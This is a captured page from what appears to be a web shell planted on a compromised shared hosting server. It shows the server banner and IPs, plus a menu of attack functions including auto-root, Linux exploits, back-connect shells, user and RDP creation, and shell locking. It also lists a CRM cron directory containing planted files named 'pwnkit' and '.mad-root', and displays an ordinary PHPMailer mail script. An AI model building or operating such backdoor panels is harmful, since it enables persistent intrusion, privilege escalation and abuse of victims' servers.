Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
cron /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwx---r-x
modules
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw----r--
MailScanner.service
2.78
KB
-rw----r--
README-NewCronServiceSetup.txt
1.87
KB
-rw----r--
SendReminder.service
12.69
KB
-rw----r--
class.phpmailer.php
44.84
KB
-rw----r--
class.smtp.php
32.69
KB
-rw----r--
executecron.sh
594
B
-rw----r--
intimateTaskStatus.bat
887
B
-rw----r--
intimateTaskStatus.php
6.98
KB
-rw----r--
jobstartwindows.bat
1.19
KB
-rw----r--
output.txt
283
B
-rw----r--
pwnkit
0
B
-rwx---r-x
schtasks.exe
111
KB
-rw----r--
send_mail.php
1.94
KB
-rw----r--
sendreminder.sh
583
B
-rw----r--
sendsupportnotification.sh
594
B
-rw----r--
vtigercron.bat
748
B
-rw----r--
vtigercron.sh
651
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : send_mail.php
<?php //////////////////////////////////////////////////// // PHPMailer - PHP email class // // Class for sending email using either // sendmail, PHP mail(), or SMTP. Methods are // based upon the standard AspEmail(tm) classes. // // Copyright (C) 2001 - 2003 Brent R. Matzelle // // License: LGPL, see LICENSE //////////////////////////////////////////////////// /** * PHPMailer - PHP email transport class * @package PHPMailer * @author Brent R. Matzelle * @copyright 2001 - 2003 Brent R. Matzelle */ //file modified by richie require("class.smtp.php"); require("class.phpmailer.php"); require_once 'include/utils/CommonUtils.php'; function sendmail($to,$from,$subject,$contents,$mail_server,$mail_server_username,$mail_server_password,$filename,$smtp_auth='') { $mail = new PHPMailer(); $mail->Subject = $subject; $mail->Body = $contents;//"This is the HTML message body <b>in bold!</b>"; $initialfrom = $from; $mail->IsSMTP(); // set mailer to use SMTP //$mail->Host = "smtp1.example.com;smtp2.example.com"; // specify main and backup server $mail->Host = $mail_server; // specify main and backup server if($smtp_auth == 'true') $mail->SMTPAuth = true; else $mail->SMTPAuth = false; $mail->Username = $mail_server_username ;//$smtp_username; // SMTP username $mail->Password = $mail_server_password ;//$smtp_password; // SMTP password $mail->From = $from; $mail->FromName = $initialfrom; $mail->AddAddress($to); // name is optional $mail->AddReplyTo($from); $mail->WordWrap = 50; // set word wrap to 50 characters $mail->IsHTML(true); // set email format to HTML $mail->AltBody = "This is the body in plain text for non-HTML mail clients"; // $mail->Sender= getReturnPath($mail->Host); if(!$mail->Send()) { echo "Message could not be sent. <p>"; echo "Mailer Error: " . $mail->ErrorInfo; exit; } } ?>
Close